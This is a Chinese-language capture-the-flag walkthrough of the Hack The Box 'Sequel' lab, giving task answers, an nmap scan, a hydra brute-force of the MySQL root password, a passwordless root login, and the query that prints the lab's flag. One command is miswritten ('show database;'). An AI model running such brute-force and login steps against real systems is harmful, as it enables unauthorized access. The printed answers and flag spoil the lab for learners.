前言
第一层 Sequel
依旧是SQL
Task1
During our scan, which port do we find serving MySQL?
在扫描过程中,我们发现哪个端口为 MySQL 提供服务?
A:3306
nmap开扫
nmap -A -Pn -T4 10.129.95.232
-T4
表示设置扫描速度为T4级别
这也是mysql的默认开放端口
Task2
What community-developed MySQL version is the target running?
目标运行的是哪个社区开发的MySQL版本?
A:MariaDB
由上面的扫描结果中的mysql-info可知
Task3
When using the MySQL command line client, what switch do we need to use in order to specify a login username?
使用 MySQL 命令行客户端时,我们需要使用什么开关来指定登录用户名?
A:-u
查看帮助
mysql --help
Task4
Which username allows us to log into this MariaDB instance without providing a password?
哪个用户名允许我们在不提供密码的情况下登录此MariaDB实例?
A:root
使用hydra工具对root用户的密码进行爆破
hydra -l root -e nsr mysql://10.129.95.232
-l root
是Hydra的选项之一,表示要尝试使用”root”作为用户名进行破解-e nsr
是Hydra的选项之一,表示使用”nsr”作为密码列表中的默认密码,如果破解其他密码可以把-e nsr
换成字典路径即可
最后爆破的结果是密码为空
Task5
In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
在 SQL 中,我们可以使用什么符号在查询中指定要显示表内的所有内容?
A:*
Task6
In SQL, what symbol do we need to end each query with?
在 SQL 中,我们需要用什么符号来结束每个查询?
A:;
Task7
There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
此 MySQL 实例中有三个数据库,它们在所有 MySQL 实例中都是通用的。这个主机独有的第四个名字是什么?
A:htb
先连上靶机的mysql服务
mysql -u root -h 10.129.95.232
然后查看数据库
show database;
下面三个是通用的数据库
Submit Flag
先选择要使用的数据库
use htb;
然后查询表名
show tables;
最后查询config表中的内容
select * from config;
得到flag:7b4bec00d1a39e3dd4e021ec3d915da8